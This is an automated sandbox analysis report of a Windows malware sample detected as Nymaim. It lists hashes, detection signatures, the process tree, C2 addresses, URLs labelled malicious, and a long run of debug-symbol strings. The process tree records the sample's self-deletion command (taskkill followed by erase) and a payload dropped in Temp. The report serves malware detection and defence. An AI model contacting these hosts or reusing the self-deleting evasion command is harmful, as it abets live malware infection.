Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample Name:file.exe
Analysis ID:715150
MD5:a3b774ed5023f56970eea0668ae65703
SHA1:3aebfec7980d1db1edbeccbb29044ea677be304b
SHA256:f4f6bcce8531ffa055776e57b0f650b7f87049808e3b29d65fab79ec841ed81c
Tags:exe
Infos:

Detection

Nymaim
Score:96
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Yara detected Nymaim
Antivirus detection for URL or domain
Multi AV Scanner detection for dropped file
Binary is likely a compiled AutoIt script file
Machine Learning detection for sample
May check the online IP address of the machine
C2 URLs / IPs found in malware configuration
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
One or more processes crash
May sleep (evasive loops) to hinder dynamic analysis
Internet Provider seen in connection with other malware
Sample execution stops while process was sleeping (likely an evasion)
Found dropped PE file which has not been started or loaded
PE file contains executable resources (Code or Archives)
IP address seen in connection with other malware
Downloads executable code via HTTP
Enables debug privileges
Creates a DirectInput object (often for capturing keystrokes)
Drops files with a non-matching file extension (content does not match file extension)
Sample file is different than original file name gathered from version info
Drops PE files
Checks if the current process is being debugged
Binary contains a suspicious time stamp
Uses taskkill to terminate processes
Launches processes in debugging mode, may be used to hinder debugging
Dropped file seen in connection with other malware
Creates a process in suspended mode (likely to inject code)

Classification

Process Tree

  • System is w10x64
  • file.exe (PID: 5464 cmdline: C:\Users\user\Desktop\file.exe MD5: A3B774ED5023F56970EEA0668AE65703)
    • WerFault.exe (PID: 5160 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 5464 -s 528 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
    • WerFault.exe (PID: 5176 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 5464 -s 708 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
    • WerFault.exe (PID: 3332 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 5464 -s 716 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
    • WerFault.exe (PID: 2884 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 5464 -s 724 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
    • WerFault.exe (PID: 3756 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 5464 -s 776 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
    • WerFault.exe (PID: 5704 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 5464 -s 896 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
    • WerFault.exe (PID: 5836 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 5464 -s 908 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
    • WerFault.exe (PID: 5936 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 5464 -s 1156 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
    • WerFault.exe (PID: 5312 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 5464 -s 1228 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
    • cmd.exe (PID: 5996 cmdline: C:\Windows\System32\cmd.exe" /c start /I "" "C:\Users\user~1\AppData\Local\Temp\du2kVBqiTxfv\Cleaner.exe MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • conhost.exe (PID: 3348 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • Cleaner.exe (PID: 2380 cmdline: "C:\Users\user~1\AppData\Local\Temp\du2kVBqiTxfv\Cleaner.exe" MD5: 04514BD4962F7D60679434E0EBE49184)
        • WerFault.exe (PID: 5524 cmdline: C:\Windows\system32\WerFault.exe -u -p 2380 -s 1576 MD5: 2AFFE478D86272288BBEF5A00BBEF6A0)
        • WerFault.exe (PID: 5684 cmdline: C:\Windows\system32\WerFault.exe -u -p 2380 -s 1576 MD5: 2AFFE478D86272288BBEF5A00BBEF6A0)
    • WerFault.exe (PID: 4652 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 5464 -s 1292 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
    • cmd.exe (PID: 1436 cmdline: "C:\Windows\System32\cmd.exe" /c taskkill /im "file.exe" /f & erase "C:\Users\user\Desktop\file.exe" & exit MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • conhost.exe (PID: 604 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • taskkill.exe (PID: 2888 cmdline: taskkill /im "file.exe" /f MD5: 15E2E0ACD891510C6268CB8899F2A1A1)
  • cleanup

Malware Configuration

Threatname: Nymaim

{"C2 addresses": ["208.67.104.97", "85.31.46.167"]}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000000.00000000.423202429.0000000000400000.00000040.00000001.01000000.00000003.sdmpJoeSecurity_NymaimYara detected NymaimJoe Security
    00000000.00000000.436811597.00000000008F9000.00000040.00000020.00020000.00000000.sdmpWindows_Trojan_RedLineStealer_ed346e4cunknownunknown
    • 0xaf0:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
    00000000.00000000.404054334.00000000008F9000.00000040.00000020.00020000.00000000.sdmpWindows_Trojan_RedLineStealer_ed346e4cunknownunknown
    • 0xaf0:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
    00000000.00000000.398224905.0000000000400000.00000040.00000001.01000000.00000003.sdmpJoeSecurity_NymaimYara detected NymaimJoe Security
      00000000.00000000.429736065.0000000000400000.00000040.00000001.01000000.00000003.sdmpJoeSecurity_NymaimYara detected NymaimJoe Security
        Click to see the 60 entries

        Unpacked PEs

        SourceRuleDescriptionAuthorStrings
        0.0.file.exe.400000.7.raw.unpackJoeSecurity_NymaimYara detected NymaimJoe Security
          0.0.file.exe.860e67.24.unpackJoeSecurity_NymaimYara detected NymaimJoe Security
            0.0.file.exe.860e67.16.raw.unpackJoeSecurity_NymaimYara detected NymaimJoe Security
              0.0.file.exe.400000.0.unpackJoeSecurity_NymaimYara detected NymaimJoe Security
                0.0.file.exe.400000.11.raw.unpackJoeSecurity_NymaimYara detected NymaimJoe Security
                  Click to see the 62 entries

                  Sigma Signatures

                  No Sigma rule has matched

                  Snort Signatures

                  No Snort rule has matched

                  Joe Sandbox Signatures

                  Click to jump to signature section

                  Show All Signature Results

                  AV Detection

                  barindex
                  Multi AV Scanner detection for submitted file
                  Source: file.exeReversingLabs: Detection: 47%
                  Antivirus detection for URL or domain
                  Source: http://208.67.104.97/powfhxhxcjzx/ping.php?sub=NOSUB&stream=start&substream=mixinteURL Reputation: Label: malware
                  Source: http://208.67.104.97/powfhxhxcjzx/ping.php?sub=NOSUB&stream=start&substream=mixinteURL Reputation: Label: malware
                  Source: http://208.67.104.97/powfhxhxcjzx/ping.php?sub=NOSUB&stream=mixtwo&substream=mixinteURL Reputation: Label: malware
                  Source: http://208.67.104.97/powfhxhxcjzx/ping.php?sub=NOSUB&stream=start&substURL Reputation: Label: malware
                  Source: http://171.22.30.106/library.phpURL Reputation: Label: malware
                  Source: http://208.67.104.97/powfhxhxcjzx/ping.php?sub=NOSUB&stream=start&substream=mixinte0I/RAvira URL Cloud: Label: malware
                  Source: http://208.67.104.97/powfhxhxcjzx/ping.php?sub=NOSUB&stream=start&substream=mixinteSAvira URL Cloud: Label: malware
                  Source: http://208.67.104.97/powfhxhxcjzx/ping.php?sub=NOSUB&stream=start&substream=mixinte3Avira URL Cloud: Label: malware
                  Multi AV Scanner detection for dropped file
                  Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6M6D1PMD\soft[1]ReversingLabs: Detection: 28%
                  Source: C:\Users\user\AppData\Local\Temp\du2kVBqiTxfv\Cleaner.exeReversingLabs: Detection: 28%
                  Machine Learning detection for sample
                  Source: file.exeJoe Sandbox ML: detected
                  Source: 00000000.00000000.429736065.0000000000400000.00000040.00000001.01000000.00000003.sdmpMalware Configuration Extractor: Nymaim {"C2 addresses": ["208.67.104.97", "85.31.46.167"]}
                  Source: file.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                  Source: C:\Users\user\Desktop\file.exeFile opened: C:\Windows\SysWOW64\msvcr100.dll
                  Source: Binary string: UxTheme.pdb source: WerFault.exe, 00000020.00000003.621274264.000001E43111C000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000020.00000003.620340840.000001E43111C000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000020.00000003.621417383.000001E43111C000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000020.00000003.620483277.000001E43111C000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: rsaenh.pdb source: WerFault.exe, 00000020.00000003.621274264.000001E43111C000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000020.00000003.620340840.000001E43111C000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000020.00000003.621417383.000001E43111C000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000020.00000003.620483277.000001E43111C000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: bcrypt.pdb source: WerFault.exe, 00000020.00000003.621274264.000001E43111C000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000020.00000003.620340840.000001E43111C000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000020.00000003.621417383.000001E43111C000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000020.00000003.620483277.000001E43111C000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: System.Configuration.pdbb source: WerFault.exe, 00000020.00000003.620621756.000001E431144000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: win32u.pdba source: WerFault.exe, 00000020.00000003.620340840.000001E43111C000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000020.00000003.620483277.000001E43111C000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: ucrtbase.pdb source: WerFault.exe, 00000020.00000003.620292704.000001E431117000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: ucrtbase.pdb8 source: WerFault.exe, 00000020.00000003.620292704.000001E431117000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: msvcrt.pdb source: WerFault.exe, 00000020.00000003.620292704.000001E431117000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: cryptbase.pdb^ source: WerFault.exe, 00000020.00000003.621274264.000001E43111C000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000020.00000003.620340840.000001E43111C000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000020.00000003.621417383.000001E43111C000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000020.00000003.620483277.000001E43111C000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: gdiplus.pdb$ source: WerFault.exe, 00000020.00000003.620981328.000001E431127000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000020.00000003.621455993.000001E431127000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000020.00000003.620206636.000001E431120000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: s\`l\.pdb source: Cleaner.exe, 00000018.00000000.572272911.00000009D2EF5000.00000004.00000010.00020000.00000000.sdmp
                  Source: Binary string: winnsi.pdb source: WerFault.exe, 00000020.00000003.620981328.000001E431127000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000020.00000003.621455993.000001E431127000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000020.00000003.620206636.000001E431120000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: clr.pdb source: WerFault.exe, 00000020.00000003.621274264.000001E43111C000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000020.00000003.620340840.000001E43111C000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000020.00000003.621417383.000001E43111C000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000020.00000003.620483277.000001E43111C000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: System.ni.pdb0 source: WerFault.exe, 00000020.00000003.600768010.000001E4306F9000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: cryptsp.pdb source: WerFault.exe, 00000020.00000003.621274264.000001E43111C000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000020.00000003.620340840.000001E43111C000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000020.00000003.621417383.000001E43111C000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000020.00000003.620483277.000001E43111C000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: advapi32.pdb source: WerFault.exe, 00000020.00000003.620292704.000001E431117000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: gdi32.pdb8 source: WerFault.exe, 00000020.00000003.621394438.000001E43111A000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000020.00000003.621252876.000001E43111A000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000020.00000003.620458409.000001E43111A000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000020.00000003.620292704.000001E431117000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: System.Xml.pdbc source: WerFault.exe, 00000020.00000003.620621756.000001E431144000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: shlwapi.pdb source: WerFault.exe, 00000020.00000003.620292704.000001E431117000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: mscorlib.ni.pdb source: WerFault.exe, 00000020.00000003.621274264.000001E43111C000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000020.00000003.620340840.000001E43111C000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000020.00000003.621417383.000001E43111C000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000020.00000003.620483277.000001E43111C000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: kernel32.pdb source: WerFault.exe, 00000020.00000003.602123484.000001E43064D000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000020.00000003.620292704.000001E431117000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: msvcrt.pdb8 source: WerFault.exe, 00000020.00000003.620292704.000001E431117000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: System.Windows.Forms.ni.pdbb source: WerFault.exe, 00000020.00000003.620701035.000001E43112D000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000020.00000003.620206636.000001E431120000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: ntdll.pdb8 source: WerFault.exe, 00000020.00000003.620436247.000001E431116000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000020.00000003.620402333.000001E431112000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: dwmapi.pdbG source: WerFault.exe, 00000020.00000003.620981328.000001E431127000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000020.00000003.621455993.000001E431127000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000020.00000003.620206636.000001E431120000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: win32u.pdb source: WerFault.exe, 00000020.00000003.621274264.000001E43111C000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000020.00000003.620340840.000001E43111C000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000020.00000003.621417383.000001E43111C000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000020.00000003.620483277.000001E43111C000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: m.pdb*,0I source: Cleaner.exe, 00000018.00000000.572272911.00000009D2EF5000.00000004.00000010.00020000.00000000.sdmp
                  Source: Binary string: UxTheme.pdb6 source: WerFault.exe, 00000020.00000003.621274264.000001E43111C000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000020.00000003.620340840.000001E43111C000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000020.00000003.621417383.000001E43111C000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000020.00000003.620483277.000001E43111C000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: dwmapi.pdb source: WerFault.exe, 00000020.00000003.620981328.000001E431127000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000020.00000003.621455993.000001E431127000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000020.00000003.620206636.000001E431120000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: dnsapi.pdb] source: WerFault.exe, 00000020.00000003.620981328.000001E431127000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000020.00000003.621455993.000001E431127000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000020.00000003.620206636.000001E431120000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: mscoree.pdb source: WerFault.exe, 00000020.00000003.605287062.000001E430C1F000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000020.00000003.603046751.000001E430C1E000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000020.00000003.620292704.000001E431117000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000020.00000003.602098493.000001E430647000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000020.00000003.600066159.000001E430647000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: ntdll.pdb0 source: WerFault.exe, 00000020.00000003.605731171.000001E430641000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: shcore.pdbj source: WerFault.exe, 00000020.00000003.621274264.000001E43111C000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000020.00000003.620340840.000001E43111C000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000020.00000003.621417383.000001E43111C000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000020.00000003.620483277.000001E43111C000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: imm32.pdb source: WerFault.exe, 00000020.00000003.621274264.000001E43111C000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000020.00000003.620340840.000001E43111C000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000020.00000003.621417383.000001E43111C000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000020.00000003.620483277.000001E43111C000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: ws2_32.pdb source: WerFault.exe, 00000020.00000003.620981328.000001E431127000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000020.00000003.621455993.000001E431127000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000020.00000003.620206636.000001E431120000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: kernelbase.pdb0 source: WerFault.exe, 00000020.00000003.603811328.000001E430654000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000020.00000003.602165213.000001E430654000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: mswsock.pdb source: WerFault.exe, 00000020.00000003.620981328.000001E431127000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000020.00000003.621455993.000001E431127000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000020.00000003.620206636.000001E431120000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: iphlpapi.pdb source: WerFault.exe, 00000020.00000003.620981328.000001E431127000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000020.00000003.621455993.000001E431127000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000020.00000003.620206636.000001E431120000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: m.pdbC source: Cleaner.exe, 00000018.00000000.572272911.00000009D2EF5000.00000004.00000010.00020000.00000000.sdmp
                  Source: Binary string: kernelbase.pdb8 source: WerFault.exe, 00000020.00000003.620292704.000001E431117000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: version.pdb: source: WerFault.exe, 00000020.00000003.621274264.000001E43111C000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000020.00000003.620340840.000001E43111C000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000020.00000003.621417383.000001E43111C000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000020.00000003.620483277.000001E43111C000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: nsi.pdb source: WerFault.exe, 00000020.00000003.620981328.000001E431127000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000020.00000003.621455993.000001E431127000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000020.00000003.620206636.000001E431120000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: advapi32.pdb8 source: WerFault.exe, 00000020.00000003.620292704.000001E431117000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: powrprof.pdb source: WerFault.exe, 00000020.00000003.621274264.000001E43111C000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000020.00000003.620340840.000001E43111C000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000020.00000003.621417383.000001E43111C000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000020.00000003.620483277.000001E43111C000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: imm32.pdbA source: WerFault.exe, 00000020.00000003.621274264.000001E43111C000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000020.00000003.620340840.000001E43111C000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000020.00000003.621417383.000001E43111C000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000020.00000003.620483277.000001E43111C000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: clrjit.pdb5 source: WerFault.exe, 00000020.00000003.621274264.000001E43111C000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000020.00000003.620340840.000001E43111C000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000020.00000003.621417383.000001E43111C000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000020.00000003.620483277.000001E43111C000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: System.Configuration.pdb source: WerFault.exe, 00000020.00000003.620621756.000001E431144000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000020.00000003.620919368.000001E431146000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: ole32.pdb source: WerFault.exe, 00000020.00000003.621274264.000001E43111C000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000020.00000003.620340840.000001E43111C000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000020.00000003.621417383.000001E43111C000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000020.00000003.620483277.000001E43111C000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\System.pdb source: Cleaner.exe, 00000018.00000000.584189785.0000014375B13000.00000004.00000020.00020000.00000000.sdmp, Cleaner.exe, 00000018.00000000.615655791.0000014375B1C000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: rasadhlp.pdbX source: WerFault.exe, 00000020.00000003.620981328.000001E431127000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000020.00000003.621455993.000001E431127000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000020.00000003.620206636.000001E431120000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: System.Core.ni.pdbb source: WerFault.exe, 00000020.00000003.620621756.000001E431144000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: psapi.pdb` source: WerFault.exe, 00000020.00000003.620981328.000001E431127000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000020.00000003.621455993.000001E431127000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000020.00000003.620206636.000001E431120000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: ole32.pdbL source: WerFault.exe, 00000020.00000003.621274264.000001E43111C000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000020.00000003.620340840.000001E43111C000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000020.00000003.621417383.000001E43111C000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000020.00000003.620483277.000001E43111C000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\dll\System.pdbrpW0 source: Cleaner.exe, 00000018.00000000.579357284.0000014373834000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: comctl32.pdbG source: WerFault.exe, 00000020.00000003.621274264.000001E43111C000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000020.00000003.620340840.000001E43111C000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000020.00000003.621417383.000001E43111C000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000020.00000003.620483277.000001E43111C000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: comctl32v582.pdb source: WerFault.exe, 00000020.00000003.620981328.000001E431127000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000020.00000003.621455993.000001E431127000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000020.00000003.620206636.000001E431120000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: DWrite.pdb source: WerFault.exe, 00000020.00000003.620981328.000001E431127000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000020.00000003.621455993.000001E431127000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000020.00000003.620206636.000001E431120000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: Cleaner.PDBx source: Cleaner.exe, 00000018.00000000.572272911.00000009D2EF5000.00000004.00000010.00020000.00000000.sdmp, Cleaner.exe, 00000018.00000000.614858478.00000009D2EF8000.00000004.00000010.00020000.00000000.sdmp
                  Source: Binary string: cfgmgr32.pdb source: WerFault.exe, 00000020.00000003.621274264.000001E43111C000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000020.00000003.620340840.000001E43111C000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000020.00000003.621417383.000001E43111C000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000020.00000003.620483277.000001E43111C000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: Windows.Storage.pdb source: WerFault.exe, 00000020.00000003.620206636.000001E431120000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: combase.pdb source: WerFault.exe, 00000020.00000003.620292704.000001E431117000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: System.Drawing.pdb source: WerFault.exe, 00000020.00000003.620894635.000001E431143000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdb source: Cleaner.exe, 00000018.00000000.578942897.00000143737A7000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: winnsi.pdbj source: WerFault.exe, 00000020.00000003.620981328.000001E431127000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000020.00000003.621455993.000001E431127000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000020.00000003.620206636.000001E431120000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: C:\Users\user~1\AppData\Local\Temp\du2kVBqiTxfv\Cleaner.PDB source: Cleaner.exe, 00000018.00000000.572272911.00000009D2EF5000.00000004.00000010.00020000.00000000.sdmp, Cleaner.exe, 00000018.00000000.614858478.00000009D2EF8000.00000004.00000010.00020000.00000000.sdmp
                  Source: Binary string: winhttp.pdbe source: WerFault.exe, 00000020.00000003.620981328.000001E431127000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000020.00000003.621455993.000001E431127000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000020.00000003.620206636.000001E431120000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: cryptsp.pdb] source: WerFault.exe, 00000020.00000003.621274264.000001E43111C000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000020.00000003.620340840.000001E43111C000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000020.00000003.621417383.000001E43111C000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000020.00000003.620483277.000001E43111C000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: profapi.pdbX source: WerFault.exe, 00000020.00000003.621274264.000001E43111C000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000020.00000003.620340840.000001E43111C000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000020.00000003.621417383.000001E43111C000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000020.00000003.620483277.000001E43111C000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: dhcpcsvc6.pdbw source: WerFault.exe, 00000020.00000003.620981328.000001E431127000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000020.00000003.621455993.000001E431127000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000020.00000003.620206636.000001E431120000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: C:\Users\user~1\AppData\Local\Temp\du2kVBqiTxfv\Cleaner.PDB08 source: Cleaner.exe, 00000018.00000000.572272911.00000009D2EF5000.00000004.00000010.00020000.00000000.sdmp, Cleaner.exe, 00000018.00000000.614858478.00000009D2EF8000.00000004.00000010.00020000.00000000.sdmp
